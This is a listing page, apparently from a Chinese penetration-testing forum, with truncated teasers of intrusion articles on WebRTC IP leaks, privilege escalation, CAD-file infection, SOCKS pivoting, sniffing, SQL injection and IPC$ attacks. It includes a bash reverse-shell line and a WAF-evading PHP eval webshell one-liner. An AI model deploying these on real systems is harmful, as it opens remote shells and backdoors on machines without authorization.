渗透测试
通过WebRTC漏洞 获取内网IP以及VPN用户真实IP
WebRTC是一个支持网络浏览器进行实时语音对话或视频对话的软件架构。它于 2011 年 6 月 1 日开源并在 Google、Mozilla、Opera 支持下被包括进万维网联盟的 W3C 推荐标准。不同的浏览器可通过该技术进行免费的语音和视频聊天。在周五的 Google I/O 大会上,Google 的 WebRTC 工程主管 Justin Uberti 表
linux下各种反弹shell脚本
大家在做渗透测试的时候,遇到linux的服务器,想反弹shell回来本地溢出提权,怎么办?上传反弹脚本?当然可以,今天再告诉大家几种方法,国外大牛和国内大牛整理的,希望大家喜欢。 bash版本:/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 pe
过狗菜刀专用一句话简解及用法(不要再醉了)
论坛有个哥们儿服务器上查出来个“特殊的”一句话,代码如下:<?$Exp=strrev($_POST);eval($Exp($_POST));原帖:https://www.t00ls.com/thread-29107-1-1.html回帖的人基本都是醉了,因为里面有个大大的eval在那,所以大家都觉得这是个很SB的一句话,还过什么狗。。。事实上,这个一句话的确能过狗。而
一次曲折的提权过程+心得
小菜文章,大牛略过。文中如有不对之处,请众大神提出指正。小菜先谢过了!因为某原因搞某个站。主站搞不动,只能从二级域名下手,二级域名大多也不好搞,but,发现其中一个站上有其他不少旁站,于是从旁站下手。拿shell无亮点,一笔带过吧,上传,bingo~提权过程得到点心得和经验,重点分享下:Shell
php5绕过open_basedir读文件脚本
前段时间的文章了,老君让我转过来,在土司留个档,没看过的也可以看看~~ 这是前段时间写的代码了(http://www.weibo.com/1074745063/ByAPqj7s0),最近一直忙着和几个同学一起做非安全类的创业项目。所以也没拿到JAE、SAE测试一下。 漏洞很久之前(大概5年前)被提出来了,但并不是php代码上的
通过CAD入侵
CAD 文件DWG文件 后面有acad.lsp 或者acaddoc.lsp 会自动加载 lsp能添加管理员账户一下是感染部分(转的)最近自己的电脑中了CAD病毒,症状为打开一个dwg文件后,在该dwg文件所在目录下就会自动生成一个“acaddoc.lsp”文件,即使手工将其删除,下次打开dwg文件时又会自动生成。如果把dwg文件和acaddo
![[原创]socks代理篇:工具Proxifier+regeorg的联合运用](https://www.t00ls.com/attachments/month_1411/1411301404721955b7b4ad17f1.jpg)
[原创]socks代理篇:工具Proxifier+regeorg的联合运用
关于socks代理,据笔者理解,他应该是从osi通信层进行全局代理。关于这个,论坛里的大神求科普。(socks代理与socket通信有什么区别?)关于socks代理,笔者百试不爽,在以往的帖子中有所提汲,《ssh socks动态端口转发在项目中的应用》,《php动态socket代理脚本怎么写》,《关于webshell下socket代理
明文嗅探
0x01 网卡工作原理简介 以太网的标准拓扑结构为总线型拓扑,尽管目前快速以太网使用交换机来进行网络连接和组织,但在逻辑上,以太网仍然是总线型拓扑。网卡的主要工作是对总线当前状态进行探测,确定是否进行数据传输;对接收到的数据帧的物理地址(MAC)进行检查,并根据网卡驱动程序设置的接收
一个注入小技巧:利用子查询忽略字段名
之前在乌云发过,不知非首发还算不算原创嗯。。其实我只是需要个发帖数来看帖子,一时间想不到发什么只能发个旧的了---------条件:已知表名,字段名未知,数据库本身支持子查询对付access和mysql4.0.5以上比较有用,也可以用来偷懒,比如从各种ctf的flag表里面读数据思路:在子查询里面写针对目标表的
一份详尽的IPC$入侵资料
原文链接:http://www.xfocus.net/articles/200303/493.html仅优化排版,内容未做删减。ipc$入侵应该是很老的东西了,目前公共的基础服务运营商都已经对139、445端口数据进行了屏蔽。近期在大的内网做圈存机渗透测试,过程中搜罗到这篇资料,分享给有需要的坛友。一、唠叨一下网上关于ipc$入侵的文章可
